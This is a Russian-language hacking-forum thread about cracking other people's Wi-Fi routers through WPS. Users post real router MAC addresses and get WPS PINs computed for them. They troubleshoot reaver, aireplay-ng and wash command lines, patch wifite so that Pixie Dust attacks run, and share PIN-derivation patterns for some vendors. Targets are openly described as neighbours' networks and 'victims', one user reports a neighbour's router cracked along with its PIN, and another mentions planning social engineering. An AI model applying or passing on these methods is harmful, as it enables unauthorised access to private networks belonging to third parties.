http://3wifi.stascorp.com/wpspin у меня не пашет.

помогите вычислить пин для:

BC:EE:7B:66:A0:54 - ASUS RT-N12E

VladimirV
29.04.2016, 10:39
http://3wifi.stascorp.com/wpspin у меня не пашет.

помогите вычислить пин для:

BC:EE:7B:66:A0:54 - ASUS RT-N12E



27744307

Triton_Mgn
29.04.2016, 10:46
http://3wifi.stascorp.com/wpspin у меня не пашет.

помогите вычислить пин для:

BC:EE:7B:66:A0:54 - ASUS RT-N12E



бывают передряги, сами ждем обновку RouterScan-локальный инструмент.

Может binarymaster раздобрится и выложит)

startless
29.04.2016, 12:09
Есть у кого-нибудь доступ к zte zxhn h118n c bssid AP d4:76:ea:xx:xx:xx из WAN или вообще хоть откуда-нибудь? Может дамп прошивки есть или хотя-бы конфиг?

Triton_Mgn
29.04.2016, 12:12
Есть у кого-нибудь доступ к zte zxhn h118n c bssid AP d4:76:ea:xx:xx:xx из WAN или вообще хоть откуда-нибудь? Может дамп прошивки есть или хотя-бы конфиг?



Доступ может и есть, понимаешь что просходит РАЗРЫ СВЯЗИИИИИ и уже мой дом и не улица, а совершенно другой адрес.

startless
29.04.2016, 12:14
Вот тут вообще ничего не понял

Triton_Mgn
29.04.2016, 12:18
По пальцам. Врядли у этого роутера есть свой- забитый IP адрес , тоесть если никто не установил на него спец софт, а я думаю что так и естть, провайдер снимает с себя наргузку передавая постоянно другой адрес, зайди на myip - запиши. Зайди завтра и убедишься, что он поменялся.

Вроде доходчиво.

startless
29.04.2016, 12:19
Я предполагаю, что, возможно, сработает метод, описанный тут http://blog.alguien.site/2013/12/hacking-wifi-zte-zxhn-h108n.html

Но для этого нужен MAC, которым роутер светит в WAN.

Triton_Mgn
29.04.2016, 12:22
Все верно но есть маленький нюанс, вы должны иметь доступ в веб морде , через все тот же IP адрес.

startless
29.04.2016, 12:24
По пальцам. Врядли у этого роутера есть свой- забитый IP адрес , тоесть если никто не установил на него спец софт, а я думаю что так и естть, провайдер снимает с себя наргузку передавая постоянно другой адрес, зайди на myip - запиши. Зайди завтра и убедишься, что он поменялся.

Вроде доходчиво.



Адреса меняются при перезагрузке роутера. А жертва работает постоянно, ни разу не перезагружался даже. По крайней мере, роутер, который у меня дома круглые сутки работает, IP не меняет (только при перезагрузке или откл по питанию).

Triton_Mgn
29.04.2016, 12:24
Мас можно вычислить хоть на телефоне/ Play Market - wps pin

Triton_Mgn
29.04.2016, 12:25
Тогда конкретезируйте задачу, коли есть к нему доступ, что Вы хотите?

startless
29.04.2016, 12:27
Все верно но есть маленький нюанс, вы должны иметь доступ в веб морде , через все тот же IP адрес.



Так я об этом и спросил изначально! Мне надо залезть в аналогичный роутер, слить конфиг, посмотреть как и что там устроено. Может что и выйдет. Так ведь нет ни одного!

Triton_Mgn
29.04.2016, 12:30
Читайте гидру я сразу и не понял

Тут мануал https://forum.antichat.ru/threads/436408/

Потом отпишитесь если получится.

А вообще форум надо читать - листать.

startless
29.04.2016, 12:39
Читайте гидру я сразу и не понял

Тут мануал https://forum.antichat.ru/threads/436408/

Потом отпишитесь если получится.

А вообще форум надо читать - листать.



Что мне толку от гидры, если роутер со всех сторон заткнут? Есть только очень хороший сигнал и включенный на нем WPS, который НЕ брутится. Я уже о нем постил ранее. Хендшейк пойман и брутится по 12 цифрам. Осталось примерно ... МЕСЯЦ!!! Так пока время идет, я его любыми методами пытаюсь расколоть. Видимо, скоро социнженерию подключу...

Triton_Mgn
29.04.2016, 12:42
Кидайте Handhsake в тему подбора паролей, если у Вас есть доступ и не верите в Hydra мой поклон, извинете, но советы Вы вообще не вопринимаете

startless
29.04.2016, 13:01
Кидайте Handhsake в тему подбора паролей, если у Вас есть доступ и не верите в Hydra мой поклон, извинете, но советы Вы вообще не вопринимаете



Я может непонятно объяснил? К роутеру НЕТ ДОСТУПА!!! Ни из WAN, ни из WLAN, ни из LAN! НИОТКУДА!!! Есть только сильный сигнал Wi-Fi с включенным WPS. При чем тут тогда вообще гидра? Странно, что Вы такое советуете - вроде бы и не новичок...

И потом, если известные сервисы по бруту хендшейков за 3 недели результата не дали, я не вижу смысла выкладывать его на античат, перебираю своими средствами.

Triton_Mgn
29.04.2016, 13:08
Ну Вс всех то не понять и не запомнить, мы люди а не роботы, вам выше дан был дельный совет, поймать Hsh выложить на бесплатный перебор к нам, если не поможеь можжно обратить в платный перебор. Если Ваши средства хороши зачем тогда писать сюда? Что мы Вам что то нового преподнесем- нет.

Вы и сами спец.

startless
29.04.2016, 13:54
Дельный совет принят. Спасибо. Теперь меня интересуют альтернативные методы получения результата. А именно то, о чем я в самом начале дискуссии спросил - доступ к админке роутера с аналогичным MAC. Вот с этой целью, собственно, я сюда и пишу. В надежде, что кто-то более опытный подскажет. А если получится роутер взломать, тогда может и я что-то новое преподнесу. Не так ли?

Felis-Sapiens
29.04.2016, 15:07
Есть у кого-нибудь доступ к zte zxhn h118n c bssid AP d4:76:ea:xx:xx:xx из WAN или вообще хоть откуда-нибудь? Может дамп прошивки есть или хотя-бы конфиг?



Не знаю на счёт d4:76:ea:, есть домрушная и оригинальная прошивки: http://4pda.ru/forum/index.php?showtopic=463323&st=20#entry38654654.

Для обеих, кстати, есть словари стандартных паролей.

C-3PO
29.04.2016, 15:44
Подскажите, пожалуйста, можно ли получить оффлайновый генератор http://3wifi.stascorp.com/wpspin/ в виде HTML, чтобы сразу для Linux и Windows?

Было бы очень полезно, когда база не доступна или под рукой нет инета.

Спасибо!

Felis-Sapiens
29.04.2016, 16:08
Подскажите, пожалуйста, можно ли получить оффлайновый генератор http://3wifi.stascorp.com/wpspin/ в виде HTML, чтобы сразу для Linux и Windows?

Было бы очень полезно, когда база не доступна или под рукой нет инета.

Спасибо!



http://rghost.ru/858wgVqrm

startless
29.04.2016, 16:51
Не знаю на счёт d4:76:ea:, есть домрушная и оригинальная прошивки: http://4pda.ru/forum/index.php?showtopic=463323&st=20#entry38654654.

Для обеих, кстати, есть словари стандартных паролей.



Да, по этим словарям уже прогнал, не то. Видимо, это какая-то обновленная версия прошивки. Неделю назад соседям установили такой же роутер. Сигнал еще лучше, чем у первой жертвы. Однако, WPS тоже не брутится. Судя по всему, алгоритм в роутере вычисляет попытку брута и включает некую защиту: в какой-то момент типа принимает первую часть пина, ну а вторую часть бесконечно динамит. Кто-нибудь знает, как обойти эту защиту?

PleBeY
30.04.2016, 00:41
48:5B:39:42:B2:39 WL520gu ASUS как к нему лучше подбирать wps pin поделитесь опытом и возможно ли это вообще?

Vltv
30.04.2016, 00:51
EC:43:F6:03:d7:68 Zyxel Keenetic Giga

на команду: reaver -i wlan0 -c 1 -b EC:43:F6:037:68 -vv -S

отвечает: WARNING: Failed to associate with EC:43:F6:037:68 (ESSID: Leonidus_NetX)

Как быть?

binarymaster
30.04.2016, 01:30
на команду: reaver -i wlan0 ...

отвечает: WARNING: Failed to associate



wlan0 ?

Адаптер в режим мониторинга хоть перевели? Это ведь mon0, либо wlan0mon.

Vltv
30.04.2016, 11:19
Прошу прощения сразу не написал

Kali Linux 2.0

Перевожу в режим монитора командами

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

airodump-ng и mdk3 работают как положено.

Vikhedgehog
30.04.2016, 13:20
Прошу прощения сразу не написал

Kali Linux 2.0

Перевожу в режим монитора командами

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

airodump-ng и mdk3 работают как положено.



Попробуй ввести aireplay-ng -1 0 -a EC:43:F6:037:68 wlan0

Если выводит Denied (code 12), wrong ESSID or WPA? значит WPS не работает.

Если ничего не происходит (зацикливается) то что-то с сигналом.

Если зацикливается, но в конце каждой строчки написано [ACK], значит возможно у ТД есть фильтрация по MAC

startless
30.04.2016, 14:24
EC:43:F6:03:d7:68 Zyxel Keenetic Giga

на команду: reaver -i wlan0 -c 1 -b EC:43:F6:037:68 -vv -S

отвечает: WARNING: Failed to associate with EC:43:F6:037:68 (ESSID: Leonidus_NetX)

Как быть?



В Kali 2.0 режим монитора создается с виртуальным устройством wlan0mon. Скорее всего Вам нужно именно его указать после ключа -i.

Vltv
30.04.2016, 17:34
На команду aireplay-ng -1 0 -a EC:43:F6:037:68 wlan0

ответил

No source MAC (-h) specified. Using the device MAC (00:22:88:02:18:F0)

16:39:27 Waiting for beacon frame (BSSID: EC:43:F6:037:68) on channel 1

16:39:27 Sending Authentication Request (Open System) [ACK]

16:39:27 Authentication successful

16:39:27 Sending Association Request [ACK]

16:39:27 Association successful (AID: 1)

P.S. Hе подскажите-ли где в linux хранятся команды, которые набирались в терминале?

hydra
30.04.2016, 18:04
P.S. Hе подскажите-ли где в linux хранятся команды, которые набирались в терминале?



Обычно в домашней директории пользователя.Например /home/kolya Называется этот файл обычно .bash_history.

Но файл скрытый.Чтоб посмотреть скрытые файлы зажми Ctrl+h

VasiliyP
30.04.2016, 18:12
EC:43:F6:03:d7:68 Zyxel Keenetic Giga

на команду: reaver -i wlan0 -c 1 -b EC:43:F6:037:68 -vv -S

отвечает: WARNING: Failed to associate with EC:43:F6:037:68 (ESSID: Leonidus_NetX)

Как быть?



Попробуйте этот reaver, и если попробуете - просьба отписать здесь.

http://rghost.ru/645WgR4CY

Если что-то не получается, запишите cap файл, с интерфейса, тогда можно точно будет сказать, в чём там проблема.

У reaver есть особенность - не любит когда точка передает несколько одинаковых пакетов, возможно - ваш случай. По ссылке - исправленная версия.

Upd: запускать так: ./reaver , если без ./ - будет запущен тот, что установлен в системе.

Vltv
30.04.2016, 18:21
Обычно в домашней директории пользователя.Например /home/kolya Называется этот файл обычно .bash_history.

Но файл скрытый.Чтоб посмотреть скрытые файлы зажми Ctrl+h



Спасибо, нашёл

Vltv
30.04.2016, 18:58
Попробуйте этот reaver, и если попробуете - просьба отписать здесь.

http://rghost.ru/645WgR4CY

Если что-то не получается, запишите cap файл, с интерфейса, тогда можно точно будет сказать, в чём там проблема.

У reaver есть особенность - не любит когда точка передает несколько одинаковых пакетов, возможно - ваш случай. По ссылке - исправленная версия.

Upd: запускать так: ./reaver , если без ./ - будет запущен тот, что установлен в системе.



Честно сказать я в linux совсем нуб. Куда необходимо скопировать, или как-то инсталлировать новый reaver, что-бы он работал. (из папки Загрузки не запускается)

VasiliyP
30.04.2016, 19:02
chmod +x reaver

-это дать права на выполнение. Но лучше сначала скопировать в домашнюю папку, т.к. неизвестно - можно ли из вашей "папки Загрузки" что-либо запускать.

hydra
30.04.2016, 19:12
Честно сказать я в linux совсем нуб. Куда необходимо скопировать, или как-то инсталлировать новый reaver, что-бы он работал. (из папки Загрузки не запускается)



Попробуй запихать reaver в другую папку.Создай например папку reaver.Затем в терминале заходиш в неё так:

cd '/home/kolya/reaver' --> enter

ну и запускаешь reaver:

./reaver -i wlan2mon -b AA:A6:68:6D:8A:87

Возможно от sudo запускать надо.

./sudo reaver -i wlan2mon -b AA:A6:68:6D:8A:87

VasiliyP
30.04.2016, 19:30
Да, у меня kali 32 бит. Если у вас 64 - не запустится, надо было сразу предупредить.

Vltv
30.04.2016, 20:10
Да, у меня kali 32 бит. Если у вас 64 - не запустится, надо было сразу предупредить.



Kali у меня тоже 32 bit. Ваш reaver запустился, начался перебор, после двух PIN точка залочилась. Я хотел попробовать PiexeDust, но похоже в Вашем его нет, или я ошибаюсь?

VasiliyP
30.04.2016, 20:21
PiexeDust - не нужно трогать в вашем случае. С Zyxel-ями reaver нужно запускать с опцией "-K 1", но сначала - заменить старый бинарник на новый.

whereis reaver

- покажет, где старый. Если не заменить, то после того, как отработает PiexeDust, запустится старый бинарник. Ну, как разлочится, попробуете. Главное - что работает.

upd: "начался перебор" - на zyxel и не будет никакого перебора - лочатся вмиг

Vltv
30.04.2016, 20:57
Заменил в папке /usr/bin/reaver. Старый был размером около 370 кБ, новый около 700 кБ. Теперь ждём-с. Попробую mdk3, правда сам zyxel на атаку не реагирует, посмотрим насколько терпения хватит у хозяина

P.S. Выражаю большую благодарность всем откликнувшимся, и особенно VasiliyP за оказанную помощь. Точка сдалась. Для статистики MAC - EC:43:F6:03:d7:68 WPS PIN - 84249036

P.P.S. Что-ж в оригинальном дистрибутиве Kali 2.0 такой неправильный reaver.

binarymaster
02.05.2016, 13:09
Немного покопался в опкодах утилиты WpsWin (идёт в поставке с Dumpper). В процессе исследования выяснилось, что ей можно пользоваться через консоль таким образом:


WpsWin Action=Registrar ESSID=WIFIAP PIN=12345670
Плюсы:

1. Работает из консоли

2. Выводит полученный пароль

3. Не требует драйвера-фильтра JumpStart Wireless

Минусы:

1. Не умеет выводить список сетей с включённым WPS

2. Не умеет ассоциироваться по конкретному BSSID (впрочем, с JSW также)

3. Выводит сообщения на испанском

Плюсов и минусов поровну, но положительные качества более весомые.

Особенности внутренней работы утилиты:

- Использует COM для работы с WPS - Provider\Microsoft.Networking.WCN

- Использует WLANAPI для добавления профиля сети в систему - WlanSetProfile

vedemur
03.05.2016, 14:39
Уважаемые Гуру, дайте ответ на такой вопрос: у меня адаптер G-SKY на чипе rtl8781l и вот почему уровень сигнала приёма с антеннами в 12db, 9db ниже, чем с родной в 5db. Это наблюдается в W7 и в Kali. Заранее спасибо. И ещё, WPSWIN у меня почему-то не запускается в W7. Может он для Kali?

VladimirV
03.05.2016, 15:03
Уважаемые Гуру, дайте ответ на такой вопрос: у меня адаптер G-SKY на чипе rtl8781l и вот почему уровень сигнала приёма с антеннами в 12db, 9db ниже, чем с родной в 5db. Это наблюдается в W7 и в Kali. Заранее спасибо. И ещё, WPSWIN у меня почему-то не запускается в W7. Может он для Kali?



Скорей всего антенну необходимо направить.

Но уровень - не всегда качество. Штырь ловит кучу отраженных сигналов, а направленная то что прилетает со стороны облучателя (патча).

Иногда приходится направлять патч-антенну в сторону от точки, так-как отраженный сигнал бывает лучше.

И на закуску поищите в гугл - 'зоны френеля'.

Mistral
03.05.2016, 15:07
уровень сигнала приёма с антеннами в 12db, 9db ниже, чем с родной в 5db



Часом в децибелах не путаетесь?Там,чем меньше число(-61 сигнал сильнее,чем -68),тем лучше.Если антенна 5 всенаправленная,а 12 направленная и не туда,то тоже вероятно.Ну и китайцы могут написать хоть 30,а есть ли они там?

vedemur
03.05.2016, 15:24
Антенны все одинаковые по форме (всенаправленные), разница только по длине-чем дольше, тем больше db. Все купленные на eBay за границей.

fire-dance
03.05.2016, 15:44
Антенны все одинаковые по форме (всенаправленные), разница только по длине-чем дольше, тем больше db. Все купленные на eBay за границей.



тебя развели ебей,ты попробуй розбери антенны и сравни их,там пустышка

atlas28
03.05.2016, 15:56
Уважаемые Гуру, дайте ответ на такой вопрос: у меня адаптер G-SKY на чипе rtl8781l и вот почему уровень сигнала приёма с антеннами в 12db, 9db ниже, чем с родной в 5db. Это наблюдается в W7 и в Kali. Заранее спасибо. И ещё, WPSWIN у меня почему-то не запускается в W7. Может он для Kali?



Тут еще нужно учитывать, что штыревая антенна имеет круговую направленность, т. е. точки, которые находятся над тобой и под тобой будут ловиться фигово. У меня этот эффект проявляется при использовании круговой на 9dBi. Т. е. точки, которые на других этажах в моем доме, лучше ловятся с маленькой антеннкой на 5dBi, а вот с антенной на 9dBi лучше ловятся только те точки, которые находятся на расстоянии по горизонтали. Я поначалу тоже не понимал, в чем дело, но сейчас ощущаю эффект от такой антенны, однако, направленная все равно будет лучше (но ее нужно правильно направлять).

vedemur
03.05.2016, 16:02
Тут еще нужно учитывать, что штыревая антенна имеет круговую направленность, т. е. точки, которые находятся над тобой и под тобой будут ловиться фигово. У меня этот эффект проявляется при использовании круговой на 9dBi. Т. е. точки, которые на других этажах в моем доме, лучше ловятся с маленькой антеннкой на 5dBi, а вот с антенной на 9dBi лучше ловятся только те точки, которые находятся на расстоянии по горизонтали. Я поначалу тоже не понимал, в чем дело, но сейчас ощущаю эффект от такой антенны, однако, направленная все равно будет лучше (но ее нужно правильно направлять).



Согласен, спасибо, не эксперементировал.

vedemur
03.05.2016, 16:03
тебя развели ебей,ты попробуй розбери антенны и сравни их,там пустышка



Разбирал, всё нормально.

VladimirV
03.05.2016, 16:14
Уважаемые Гуру, дайте ответ на такой вопрос: у меня адаптер G-SKY на чипе rtl8781l и вот почему уровень сигнала приёма с антеннами в 12db, 9db ниже, чем с родной в 5db. Это наблюдается в W7 и в Kali. Заранее спасибо. И ещё, WPSWIN у меня почему-то не запускается в W7. Может он для Kali?



Сразу не догнал. Есть тема по антеннам. Пишите там. Немного нагадили

https://forum.antichat.ru/threads/80775/

djamv
04.05.2016, 03:05
Читал выше что ребята откопали новый алгоритм генерации пинов для многих роутеров. Считаю что нужно сообщить данную находку нашим испанским коллегам

GOBLIN
04.05.2016, 04:49
Подскажите PIN к роутеру ZTE 54:BE:53:84:4F:4E

Спасибо

Stefalex85
04.05.2016, 09:59
Доброго дня! Подскажите пин на роутер netgear wnr2200 00:8e:f2:47:0d:ba . Dumpper подобрал первые 4 цифры - 2268, остальные не может найти

Felis-Sapiens
04.05.2016, 10:12
Доброго дня! Подскажите пин на роутер netgear wnr2200 00:8e:f2:47:0d:ba . Dumpper подобрал первые 4 цифры - 2268, остальные не может найти



22686534

hydra
04.05.2016, 12:02
День добрый форумчане!Тут понадобился мне скрипт wifite.py для нескольких кинетиков.

Но проблема возникла в том,что при скане точек с активным wps, выдаёт крайне мало точек.

Запускаю так: sudo python wifite.py --wps --pixie

В упор не видит моего подопытного зюкселя.В то время как wash видит всё.

Пробовал ещё модскрипт wifite-ng.Сети видит все.Но опять таки атака pixie не идёт.Висит бесконечный Waiting.....

Если запустить pixie напрямую,то всё пучком.Пин вычисляется.

Вот засада!Чего можно предпринять?Напрямую запускать невариант.Так как ноут в сумке."Работать" надо по SSH с планшета.

Набирать длинные команды жуть как не удобно.И скрипт бы тут очень помог.

P.S. При атаке --wpa сети тоже видит все.Шейки ловит нормально.

VasiliyP
04.05.2016, 14:51
https://github.com/derv82/wifite/blob/master/wifite.py

попробуйте строчки 1811..1813

---

cmd = [program_name,

'-f', cap_file,

'-C'] # ignore Frame Check Sum errors

---

заменить на:

---

cmd = [program_name, '-f', cap_file]

---

Авось поможет.

hydra
04.05.2016, 15:30
https://github.com/derv82/wifite/blob/master/wifite.py

попробуйте строчки 1811..1813

---

cmd = [program_name,

'-f', cap_file,

'-C'] # ignore Frame Check Sum errors

---

заменить на:

---

cmd = [program_name, '-f', cap_file]

---

Авось поможет.



Снова вы вточку!Всё заработало как надо.Теперь и точки все видит.И атака идёт.

Огромное спасибо!

И у меня ещё вопрос есть.

Где в скрипте можно задавать конкретные опции риверу.А то неизвестно с какими он запускается.С -a наверное.

Я часто использую опцию -N.Помогает.

Вот сейчас провёл эксперимент.Запустил reaver напрямую без -N.

sudo reaver -i wlan2mon -b 40:4A:03:77:F3:F5 -vvv -K 1 (буксует на одном месте)

А так: sudo reaver -i wlan2mon -b 40:4A:03:77:F3:F5 -vvv -K 1 -N

Срабатывает почти сразу.

VasiliyP
04.05.2016, 16:10
Запуск reaver вижу в двух местах, можно найти

cmd = ['reaver',

И добавить опциию

cmd = ['reaver', '-N',

resident148
04.05.2016, 23:07
На волне с асусами, стал смотреть wps от роутеров 00:1F:CE:ХХ:ХХ:ХХ MTSRouter_хххххх, их впс пин это (24-bit PIN)-7. Например 59172550 | 24-bit PIN, а действительный пароль 59172543

Felis-Sapiens
04.05.2016, 23:16
На волне с асусами, стал смотреть wps от роутеров 00:1F:CE:ХХ:ХХ:ХХ MTSRouter_хххххх, их впс пин это (24-bit PIN)-7. Например 59172550 | 24-bit PIN, а действительный пароль 59172543



Точнее, не 24_bit_PIN - 7, а 24_bit_PIN(BSSID-1). Последняя цифра - это контрольная сумма, так отнимать некорректно.

_Alphavite_
06.05.2016, 02:38
Подскажите PIN от роутера QTECH , 00:1F:CE:5D:2D:7F

Или Tp link 30:b5:c2:3e:65:de

буду благодарен

SlNik
06.05.2016, 03:25
Подскажите PIN от роутера QTECH , 00:1F:CE:5D:2D:7F



По выше предложенной схеме, если верно, то будет так: 61064952



Или Tp link



А про это забудь.

W@rdrive
06.05.2016, 04:28
Если у ТП-Линка ESSID типа TP-LINK_65DE, попробуй поймать хендшейк и сбрутить 8 цифр. По умолчанию у них пароль=WPS, по крайней мере, мне таких немало попадалось.

mybitco
14.08.2016, 16:51
Помогите запустить reaver на подбор пина плс.

Имею: ноут со встроенным Wi-Fi, внешний USB-Wi-Fi на чипсете RT3070, KALI версия январь 2016 (загрузка KALI с флешки)

Последовательность моих действий такова:

1. iwconfig (показывает что у меня действительно есть 2 wlan адаптера)

2. airmon-ng check kill (убиваю все лишнее)

3.

root@kali:~# airmon-ng start wlan1

PHY Interface Driver Chipset

phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)

phy1 wlan1 rt2800usb Ralink Technology, Corp. RT2870/RT3070

(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)

(mac80211 station mode vif disabled for [phy1]wlan1)

4. airodump-ng wlan1mon (получаю список всех доступных точек доступа)

5. wash -i wlan1mon (так wash не работал, wash -i wlan1mon -C а так заработал)

6.

root@kali:~# reaver -i wlan1mon -b 00:11:22:33:44:55 -c 1 -S -L -w

Reaver v1.5.2 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

mod by t6_x & DataHead & Soxrok2212

[+] Waiting for beacon from 00:11:22:33:44:55

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

^C

(пробовал наугад задавать аргументы к reaver , но результат не менялся пока не наткнулся в инете на такой вариант(ниже))

reaver -i wlan1mon -c 6 -b 00:11:22:33:44:55 -v -v -A -vv

получаю:

[+] Switching wlan1mon to channel 6

[+] Waiting for beacon from 64:70:028:EE:0E

[+] Associated with 64:70:028:EE:0E (ESSID: interzet373)

[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000

[+] Trying pin 12345670.

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[!] WARNING: 25 successive start failures

[+] Sending EAPOL START request

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670.

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

(это уже лучше смотрится, вроде хоть есть попытка отправить пин, только она длится вечно на одном месте)

Сразу отмечу что сигнал сильный, подскажите плс возможные причины проблемы и варианты их устранения? как заставить reaver перебирать пины?

Kevin Shindel
14.08.2016, 20:40
сначала в отдельном окне


aireplay-ng -1 100 -a [MAC] wlan0
потом в отдлельном окне


reaver -i wlan0 -b [MAC] -vv -c [channel] -aAwSNE

mybitco
14.08.2016, 22:13
сначала в отдельном окне


aireplay-ng -1 100 -a [MAC] wlan0
потом в отдлельном окне


reaver -i wlan0 -b [MAC] -vv -c [channel] -aAwSNE



Ничего не получается, на шаге:


aireplay-ng -1 100 -a [MAC] wlan0
Все по порядку, делал так:

1. iwconfig

2. airmon-ng check kill

3. airmon-ng start wlan1

4. airodump-ng wlan1mon

5. wash -i wlan1mon -C

6.

root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1mon

No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)

17:57:14 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1

17:57:24 No such BSSID available.

Please specify an ESSID (-e).

(добавил название сети)

root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1mon

No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)

17:58:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1

17:58:13 No such BSSID available.

(эта сеть находится на 6 канале, но aireplay-ng это не понимает)

(выбрал другую точку на 1 канале)

root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1mon

No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)

17:49:38 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1

17:49:38 Sending Authentication Request (Open System)

...

17:50:08 Sending Authentication Request (Open System)

Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.

* Check that the BSSID (-a option) is correct.

* Try to change the number of packets (-o option).

* The driver/card doesn't support injection.

* This attack sometimes fails against some APs.

* The card is not on the same channel as the AP.

* You're too far from the AP. Get closer, or lower

the transmit rate.

7. понимаю что уже нет смысла запускать reaver но все равно его запускаю в другом окне.

reaver -i wlan1mon -b 00:11:22:33:44:55 -vv -c 1 -aAwSNE

В результате все как и раньше, что делать?

Triton_Mgn
14.08.2016, 22:18
что говорит , airodump-ng скрин.

Какой адаптер , 3070 ни о чем не говорит.

Kevin Shindel
14.08.2016, 22:29
А я вхожу в режим монитора без airmon'a, попробуй так...

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

Triton_Mgn
14.08.2016, 23:18
А я вхожу в режим монитора без airmon'a, попробуй так...

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up



В Kali -Rolling по таким командам ничего не происходит, извратили Backtrack донельзя.

И airmon-ng check kill нужен чтобы убить непонятные процессы, мрак.

Alexmeh
14.08.2016, 23:28
В свое время у меня при переборе с флагом "А" и ассоциации с точкой в другом окне ривер пин пропустил. Так что команду: aireplay-ng -1 5 -a [MAC] wlan0

применяю только для проверки ассоциации с точкой.

Как вариант попробовать все проделать на WiFiSlax

mybitco
14.08.2016, 23:40
что говорит , airodump-ng скрин.

Какой адаптер , 3070 ни о чем не говорит.



вместо скрина, ответ на команду airodump-ng wlan1 ,выглядет так:

CH 5 ][ Elapsed: 42 s ][ 2016-08-14 19:08

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:11:22:33:44:55 -27 25 2 0 4 54e. WPA2 CCMP PSK abcNetwork

список разумеется побольше (штук 25 точек находится).

Сигнал сильный от тех точек которые пытался ломануть.

Адаптер брал на алиэкспрессе, если тут можно то могу потом ссылку дать, сам адаптер выглядет как альфа только с 2-мя антеннами.

Triton_Mgn
14.08.2016, 23:42
Что это за палевый mac

Triton_Mgn
14.08.2016, 23:45
давай весь список

mybitco
14.08.2016, 23:48
А я вхожу в режим монитора без airmon'a, попробуй так...

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up



Попробовал, но ничего не изменилось, вот последовательность моих действий:

1. iwconfig

2. ifconfig wlan0 down

3. ifconfig wlan1 down

4. iwconfig wlan1 mode monitor

5. ifconfig wlan1 up

6. airodump-ng wlan1

7. wash -i wlan1 -C

8. aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1

(предыдущая команда завершилась неудачно, но следующую в новом окне запускаю)

9. reaver -i wlan1 -b 00:11:22:33:44:55 -vv -c 6 -aAwSNE

после 8. aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1

получаю:

root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1

No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)

19:13:33 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6

19:13:43 No such BSSID available.

Please specify an ESSID (-e).

(добавил название точки доступа)

root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1mon

No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)

17:58:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1

17:58:13 No such BSSID available.

(взял другую точку доступа)

root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1mon

No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)

17:58:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1

17:58:13 No such BSSID available.

(в другом окне запускаю)

root@kali:~# reaver -i wlan1 -b 00:11:22:33:44:55 -vv -c 6 -aAwSNE

Reaver v1.5.2 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

mod by t6_x & DataHead & Soxrok2212

[+] Switching wlan1 to channel 6

[+] Waiting for beacon from 00:11:22:33:44:55

[+] Associated with 00:11:22:33:44:55 (ESSID: abcNetwork)

[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000

[+] Trying pin 12345670.

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

...

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[!] WARNING: 25 successive start failures

[+] Sending EAPOL START request

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670.

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

Triton_Mgn
14.08.2016, 23:50
список airodump-ng , же.

mybitco
14.08.2016, 23:51
Что это за палевый mac



А зачем мне палить чей-то реальный MAC?



давай весь список



А смысл? (Если надо я конечно могу его запостить)

Triton_Mgn
14.08.2016, 23:59
В общем говоря ты не взломаешь эту сеть - это виртуальный WiFi может даже на базе Connectify-me, о чем говорит mac 11,22,,,,,, , скажу честно , даже не проводились тесты по ловле хендшейка из программ. Вывод - Ты можешь забыть о такой точке если не словишь хендшейк. Reaver бесполезен. Лови другую, завтра протестирую на Connectify

P/S Никто не просил тебя палить mac , начало 3 элемента нам бы хватило, для определения как работает твой адаптер, ты так и не сказал - что это.

mybitco
15.08.2016, 00:19
Triton_Mgn, я ответил по поводу адаптера тут https://forum.antichat.ru/threads/310835/page-175#post-3981441

вот список того что обнаружил мой адаптер:

root@kali:~# airodump-ng wlan1

CH 2 ][ Elapsed: 30 s ][ 2016-08-14 20:02

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

